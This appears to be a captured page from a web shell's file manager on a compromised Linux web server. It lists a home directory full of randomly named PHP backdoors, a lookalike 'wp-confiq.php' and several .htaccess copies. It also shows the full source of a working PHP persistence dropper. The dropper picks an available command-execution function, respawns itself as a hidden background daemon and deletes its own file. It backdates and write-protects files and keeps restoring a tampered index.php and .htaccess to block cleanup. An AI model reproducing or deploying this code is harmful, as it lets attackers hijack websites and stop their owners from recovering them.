Linux host2.healingcodesinfo.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
Server IP : 69.167.168.125 & Your IP : 216.73.216.208
Domains : 126 Domain
User : christia
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
christia /
.trash /
Delete
Unzip
Name
Size
Permission
Date
Action
.023927152060163.php
760
B
-rw-r--r--
2026-01-31 19:29
.050134762260788.php
768
B
-rw-r--r--
2026-01-31 12:08
.225457532928870.php
776
B
-rw-r--r--
2026-01-31 13:05
.448360205540769.php
754
B
-rw-r--r--
2026-01-31 23:43
.527798673922349.php
795
B
-rw-r--r--
2026-01-30 22:04
.560347611625631.php
767
B
-rw-r--r--
2026-02-01 12:06
.629926346993061.php
762
B
-rw-r--r--
2026-02-01 00:29
.630550344721787.php
753
B
-rw-r--r--
2026-01-30 21:53
.656565944801065.php
782
B
-rw-r--r--
2026-01-31 17:02
.673661191157963.php
777
B
-rw-r--r--
2026-01-31 10:20
.697995117757118.php
762
B
-rw-r--r--
2026-02-01 13:54
.726701269383332.php
787
B
-rw-r--r--
2026-01-30 22:07
.775538105105771.php
772
B
-rw-r--r--
2026-01-31 00:26
.954480784518634.php
763
B
-rw-r--r--
2026-01-31 16:59
.deep_check_e57f2e33c4397cbe35637acc2fcbe909.txt
46
B
-rw-r--r--
2026-01-23 01:43
.htaccess
853
B
-rw-r--r--
2026-01-07 22:43
.htaccess.1
1.99
KB
-r--r--r--
2026-01-09 09:03
.htaccess.2
621
B
-r--r--r--
2026-01-15 03:22
.htaccess.3
906
B
-r--r--r--
2026-02-04 22:42
.htaccess.4
1.4
KB
-r-xr-xr-x
2026-03-19 21:42
.trash_restore
2.79
KB
-rw-------
2026-03-27 08:43
.upload_test_559db8271bde54db0a1d9c42c829ae1e.txt
47
B
-rw-r--r--
2026-01-23 01:43
0115.txt
1
B
-rw-r--r--
2026-01-29 14:41
0gm3rgli.php
19.07
KB
-rw-r--r--
2026-01-19 21:40
47nxkp7l.php
19.06
KB
-rw-r--r--
2026-01-25 01:09
COOKIE.txt
131
B
-rw-r--r--
2026-01-16 23:45
a9vtqigm.php
19.07
KB
-rw-r--r--
2026-01-23 05:31
about.php
136
B
-rw-r--r--
2026-01-30 20:24
admin-ajax.php
13.43
KB
-rw-r--r--
2026-01-30 07:31
apjy4u9s.php
19.07
KB
-rw-r--r--
2026-01-17 23:01
f5dyv77s.php
19.07
KB
-rw-r--r--
2026-01-17 21:14
header.php
12.19
KB
-rw-r--r--
2025-10-27 06:30
headers.php
140
B
-rw-r--r--
2026-01-30 20:32
hnmvdba3.php
19.06
KB
-rw-r--r--
2026-01-27 23:05
index.php
12.35
KB
-r--r--r--
2025-10-27 06:30
jlec42m7.php
19.06
KB
-rw-r--r--
2026-01-30 15:58
lock.php
136
B
-rw-r--r--
2026-01-27 13:20
lockindex.php
5.8
KB
-rw-r--r--
2026-01-09 06:09
lufix5620.php
136
B
-rw-r--r--
2026-01-27 01:12
php.ini
105
B
-rw-r--r--
2026-01-16 23:45
rgjjtsn0.php
19.06
KB
-rw-r--r--
2026-01-26 16:11
shfaitj6.php
19.07
KB
-rw-r--r--
2026-01-24 19:31
tesTlcp.php
2.87
KB
-rw-r--r--
2026-01-26 01:25
tesTpcp.php
2.87
KB
-rw-r--r--
2026-01-18 21:12
tesTyvj.php
2.87
KB
-rw-r--r--
2026-01-30 21:46
theme-editor.php
185.51
KB
-rw-r--r--
2026-01-30 07:31
wp-admin.php
14.36
KB
-rw-r--r--
2026-01-30 07:31
wp-confiq.php
89.88
KB
-rw-r--r--
2026-01-13 09:01
xe5iojw9.php
19.07
KB
-rw-r--r--
2026-02-02 01:33
Save
Rename
<?php function isCli() { $isCli = preg_match("/cli/i", php_sapi_name()) ? true : false; if ($isCli === false) { if (isset($_SERVER['argc']) && $_SERVER['argc'] >= 2) { $isCli = true; } } if ($isCli === false) { if (!isset($_SERVER['SCRIPT_NAME'])) { $isCli = true; } } return $isCli; } function ableMethod() { $methods = array('exec', 'shell_exec', 'popen', 'system', 'passthru'); $disableFuncs = explode(',', ini_get('disable_functions')); foreach ($methods as $method) { if (!in_array($method, $disableFuncs)) { return $method; } } return ''; } function curlRobots() { $url = $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['HTTP_HOST'] . '/robots'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); $resp = curl_exec($ch); curl_close($ch); return $resp; } function runCmd($cmdStr, $ableMethod) { $cmdOutput = []; $cmdOutputCode = 0; $result = ''; switch ($ableMethod) { case 'exec': @exec($cmdStr, $cmdOutput, $cmdOutputCode); if ($cmdOutputCode === 0) { if (!empty($cmdOutput)) { $result = join("\n", $cmdOutput); } return 'exec执行成功,最终success,结果:' . $result; } return 'exec执行失败'; case 'shell_exec': $result = @shell_exec($cmdStr); return 'shell_exec执行成功,最终success,结果:' . $result; case 'popen': if (@is_resource($f = @popen($cmdStr, "r"))) { while (!@feof($f)) $result .= @fread($f, 1024); } @pclose($f); return 'popen执行成功,最终success,结果:' . $result; case 'system': @ob_start(); @system($cmdStr, $cmdOutputCode); $result = @ob_get_contents(); @ob_end_clean(); if ($cmdOutputCode === 0) { return 'system执行成功,最终success,结果:' . $result; } else { return 'system执行失败'; } case 'passthru': @ob_start(); @passthru($cmdStr, $cmdOutputCode); $result = @ob_get_contents(); @ob_end_clean(); if ($cmdOutputCode === 0) { return 'passthru执行成功,最终success,结果:' . $result; } else { return 'passthru执行失败'; } default: return '未知执行函数'; } } function createFile($filepath, $content) { @unlink($filepath); @touch($filepath, strtotime("-300 days", time())); @chmod($filepath, 0777); @file_put_contents($filepath, $content); @chmod($filepath, 0444); } function lockFile($currentFileDir, $currentFilePath) { $contentHtaccess = $hashHtaccess = $contentRobots = $hashRobots = $contentXml = $hashXml = ''; $htaccessFilePath = $currentFileDir . DIRECTORY_SEPARATOR . '.htaccess'; if (file_exists($htaccessFilePath)) { $contentHtaccess = file_get_contents($htaccessFilePath); $hashHtaccess = hash('sha1', $contentHtaccess); } else { echo '.htaccess文件不存在;'; } $indexFilepath = $currentFileDir . DIRECTORY_SEPARATOR . 'index.php'; if (file_exists($indexFilepath)) { $contentFirst = file_get_contents($indexFilepath); $hashFirst = hash('sha1', $contentFirst); while (true) { $contentHtaccessNow = file_get_contents($htaccessFilePath); $hashHtaccessNow = hash('sha1', $contentHtaccessNow); if (!empty($contentHtaccess) && $hashHtaccess !== $hashHtaccessNow) { createFile($htaccessFilePath, $contentHtaccess); echo '.htaccess更改文成;'; } if (!empty($contentFirst) && !file_exists($indexFilepath)) { createFile($indexFilepath, $contentFirst); echo 'index.php文件创建完成'; } $contentNow = file_get_contents($indexFilepath); $hashNow = hash('sha1', $contentNow); if (!empty($contentFirst) && $hashFirst != $hashNow) { createFile($indexFilepath, $contentFirst); echo 'index.php文件更改完成'; } if (file_exists($currentFilePath)) { break; } sleep(2); } } else { echo 'index.php不存在'; } } $isCli = isCli(); $currentFilePath = __FILE__; $currentFileDir = pathinfo($currentFilePath, PATHINFO_DIRNAME); if (!$isCli) { $str = ''; $ableMethod = ableMethod(); if (empty($ableMethod)) { $str .= 'php没有可执行命令行的函数;'; } else { $resp = curlRobots(); if (strpos($resp, 'success') !== false) { $str .= 'robots执行成功' . ';'; } else { $str .= 'robots执行失败' . ';'; } $str .= 'php可用函数:' . ableMethod() . ';'; $cmdStr = "nohup php " . $currentFilePath . " index.php >/dev/null 2>&1 &"; $str .= '执行命令:' . $cmdStr . ';'; $res = runCmd($cmdStr, $ableMethod); $str .= '执行结果:' . $res . ';'; $str .= '该站点可被秒杀秒改,守护进程运行中'; } header("Content-type:text/html; charset=utf-8"); die($str); } else { unlink($currentFilePath); lockFile($currentFileDir, $currentFilePath); }